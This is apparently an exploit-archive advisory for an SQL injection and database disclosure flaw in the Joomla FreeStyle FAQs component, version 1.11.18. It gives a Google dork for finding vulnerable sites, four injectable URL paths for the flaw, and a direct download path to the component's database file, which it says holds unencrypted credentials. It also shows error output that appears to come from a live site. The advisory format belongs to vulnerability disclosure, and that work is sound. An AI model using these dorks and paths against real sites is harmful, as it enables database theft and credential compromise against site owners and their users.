- ####################################################################
- # Exploit Title : Joomla FSF FreeStyle FAQs Components 1.11.18 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 03/02/2019
- # Vendor Homepage : freestyle-joomla.com
- # Software Download Link : freestyle-joomla.com/products/support/freestyle-faqs-lite
- # Software Information Link : extensions.joomla.org/extension/freestyle-faqs/
- # Software Version : 1.11.18 and previous versions.
- # Software Technical Requirements : Joomla 3.5 and above PHP 5.3 or later - MySQL 5.x
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_fsf''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Freestyle FAQ is designed to provide you with a highly customised
- Frequently Asked Questions (FAQs) module on your Joomla website.
- FAQs can be organised into multiple categories, and you can add tags to FAQs
- to allow similar questions from users to be grouped together.
- Provides you with a free comprehensive FAQ solution for your website.
- The product includes a built in glossary, multiple view options and a category listing module.
- ####################################################################
- # Impact :
- ***********
- Joomla FSF FreeStyle FAQs 1.11.18 component for Joomla and other versions
- is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
- user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in the application's database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * A DAT file is a generic data file created by a specific application.
- It may contain data in binary or text format (text-based DAT files can be viewed in a text editor).
- DAT files are typically accessed only by the application or by its owners.
- * This software is prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_fsf&view=faq&catid=&Itemid=[SQL Injection]
- /index.php?option=com_fsf&view=faq&catid=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_fsf&view=faq&catid=1&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?option=com_fsf&catid=[ID-NUMBER]&view=faq&Itemid=[ID-NUMBER]&tmpl=component&faqid=[SQL Injection]
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_fsf/database_fsf.dat
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Deprecated: Non-static method SEFConfig::getConfig() should not be called statically, assuming $this from incompatible context in /home2/solovue/public_html/plugins/system/joomsef/joomsef.php on line 231
- Deprecated: Non-static method FSF_Settings::GetViewSettingsObj() should not be called statically, assuming $this from incompatible context in /home2/solovue/public_html/components/com_fsf/models/faq.php on line 40
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################